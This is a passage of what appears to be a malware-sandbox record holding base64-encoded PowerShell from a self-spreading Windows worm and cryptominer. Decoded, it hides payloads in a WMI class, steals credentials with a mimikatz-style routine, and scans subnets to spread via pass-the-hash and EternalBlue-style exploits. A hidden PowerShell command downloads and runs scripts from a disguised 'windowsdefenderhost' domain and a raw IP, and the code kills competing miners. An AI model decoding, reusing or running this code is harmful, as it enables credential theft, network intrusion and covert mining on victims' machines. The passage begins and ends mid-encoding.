AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFs